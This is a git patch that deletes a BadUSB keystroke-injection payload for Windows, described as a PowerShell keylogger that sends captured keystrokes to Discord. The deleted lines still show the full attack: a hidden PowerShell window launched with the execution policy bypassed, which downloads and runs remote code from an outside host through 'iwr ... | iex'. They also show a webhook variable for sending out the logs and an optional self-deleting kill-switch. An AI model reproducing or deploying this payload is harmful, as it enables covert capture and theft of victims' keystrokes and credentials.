From 83d16905c139de4f39cabe8b38b8c85efb122e7f Mon Sep 17 00:00:00 2001 From: I-Am-Jakoby Date: Tue, 3 Jan 2023 23:09:27 -0600 Subject: [PATCH] Delete keylogger.txt --- Payloads/Flip-Keylogger/keylogger.txt | 25 ------------------------- 1 file changed, 25 deletions(-) delete mode 100644 Payloads/Flip-Keylogger/keylogger.txt diff --git a/Payloads/Flip-Keylogger/keylogger.txt b/Payloads/Flip-Keylogger/keylogger.txt deleted file mode 100644 index a5fa34a..0000000 --- a/Payloads/Flip-Keylogger/keylogger.txt +++ /dev/null @@ -1,25 +0,0 @@ -REM Title: Keylogger - -REM Author: I am Jakoby - -REM Description: This is a Powershell based keylogger that exfiltrates the logs to discord - -REM Target: Windows 10, 11 - -REM ADDITIONAL PARAMETERS -REM The payload is set to send the logs collected every hour on the hour - -REM You maybe use the $log variable to specify a certain time instead (Use this for testing) -REM ex: $log="09:00 pm" <-- This will send the log every night at 9pm -REM You also have the option of setting up a killswitch to have the keylogger self delete at a certain time and date - -REM $ks="12/25/2022 10:00:00 PM" <-- This will make the keylogger self delete at 10pm on December 25th - -REM Calling the script with both a log time and killswitch will look something like this: - -REM $dc='https://link.iamjakoby.com/xxxx';$log="09:00 pm";$ks="12/25/2022 10:00:00 PM";iwr "https://jakoby.lol/m2m" | iex - -GUI r -DELAY 500 -STRING powershell -w h -NoP -Ep Bypass -command "$dc='https://link.iamjakoby.com/xxxx';$log='';$ks='';iwr 'https://jakoby.lol/m2m' | iex" -ENTER